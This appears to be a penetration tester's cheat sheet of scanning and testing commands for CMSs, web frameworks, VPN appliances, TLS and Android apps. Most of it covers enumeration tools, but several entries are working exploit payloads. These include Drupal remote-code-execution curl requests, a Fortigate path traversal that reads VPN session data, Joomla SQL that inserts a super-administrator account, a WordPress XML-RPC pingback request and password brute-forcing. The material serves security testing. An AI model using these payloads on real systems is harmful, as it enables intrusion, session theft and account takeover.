Techno Specific
CMS
Tools
# cmsmap
git clone https://github.com/Dionach/CMSmap && cd CMSmap && pip3 install .
cmsmap.py <target> -o cmsmap.log
# wig
git clone https://github.com/jekyc/wig.git && cd wig && python3 setup.py install
Wig.py <target> -w wig.log
# wpseku
git clone https://github.com/m4ll0k/WPSeku.git && cd WPSeku && pip install -r requirements.txt
python wpseku.py --target <target>
# droopescan
pip install droopescan
droopescan scan drupal -t 32 -u <target> [-U list_of_urls.txt]
# joomscan
joomscan -u <target>
Wordpress
Wpscan (need API key)
WPScan -v --proxy socks5://127.0.0.1:9090 -e u1-100,ap,at,cb,dbe --passwords rockyou.txt --api-token <API_key> --url <target>
* ap all plugins
* at all themes
* cb config backups
* dbe database export
Find version
- into xml via website.com/rss
- Html source code
- CMSmap or WPScan
XMLrpc
List methods
POST /xmlrpc.php HTTP/1.1
Host: <target>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 95
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
If there is pingback, try :
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<ip_pingback>:<port></string></value>
</param><param><value><string>http://<ip_pingback>:<port>/toto</string>
</value></param></params>
</methodCall>
Drupal
- intruder from 0 to 500 on /node/$
/imce
POC1 drupal 8
curl -k -i '<target>/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
--data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=uname -a'
POC2 drupal 8
curl -k -i '<target>/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
--data 'form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=touch+/tmp/2'
POC3 drupal 7
curl -k -s '<target>/drupal-7.55/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a' \
--data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id
Joomla
Joomla 1.5
user:md5_gen(1)MD5$SALT
- https://www.exploit-db.com/exploits/6234
- http://www.passwordtool.hu/joomla-password-hash-generator-salt-key
creer new users INSERT INTO jos_users (name, username, password, usertype, gid, params) VALUES ('toto', 'toto', 'fcba92f4dd6b902f8a66054b8327ae6b:F2sVBzlFOUl51D3HtRZ0tionaJQGQqB', 'Super Administrator', 25, ''); INSERT INTO jos_core_acl_aro VALUES (NULL, 'users', LAST_INSERT_ID(), 0, 'toto', 0); INSERT INTO jos_core_acl_groups_aro_map VALUES (25, '', LAST_INSERT_ID());
Moodle
# sudo apt update && sudo apt install python3 python3-pip && cd moodlescan && pip3 install -r requirements.txt
python3 moodlescan.py -k -u <URL>
Websocket
Enumeration using STEWS :
you can use : https://github.com/PalindromeLabs/STEWS/blob/main/vuln-detect/STEWS-vuln-detect.py
SQl injection :
Run python3 mitm_websocket.py ws://localhost:8156/ws and after
your sqlmap : http://localhost:8081/?id=1" --batch --dbs
Reactjs
- React Developer Tools (edit props/state/hooks values)
Security Testers: Inject JavaScript and JSON wherever you can and see what happens.
Developers: Don’t ever useeval() or dangerouslySetInnerHTML. Avoid parsing user-supplied JSON.
Webpack configuration (.map)
use sourcemapper
for i incat url.txt; do ./sourcemapper -url $i.map -output output_dir; done
Angularjs
Check the bypassSecurityTrustX / innerHTML function
bypassSecurityTrustHtml
bypassSecurityTrustScript
bypassSecurityTrustStyle
bypassSecurityTrustUrl
bypassSecurityTrustResourceUrl
ckfinder
ckfinder/ckfinder.html
Git
run script post-merge https://docs.gitlab.com/ee/administration/custom_hooks.html .git/hooks
Stormshield
# Check default password : \(UpdatePasswd=1 if factory password, 0 if the password already have been changed\)
CHPWD 101 code=00a01000 msg="Begin" format="section" \[Result\] UpdatePasswd=0
Fortigate
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
Dana
https://XXXX/dana-na/setup/psalinstall.cgi
SSL / TLS
Openssl
openssl s_client -cipher BEAST -connect <target>:443
openssl s_client -connect <target>:443 -ssl3
# Expiration date
openssl s_client -connect <target>:443 | openssl x509 -noout -dates
Check Heartbleed
cat list.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done
Check lucky13
openssl s_client -cipher DES-CBC3-SHA -connect xx.fr:443
Android
Apktool
apktool d app_name.apk
Extract sensitive info
grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/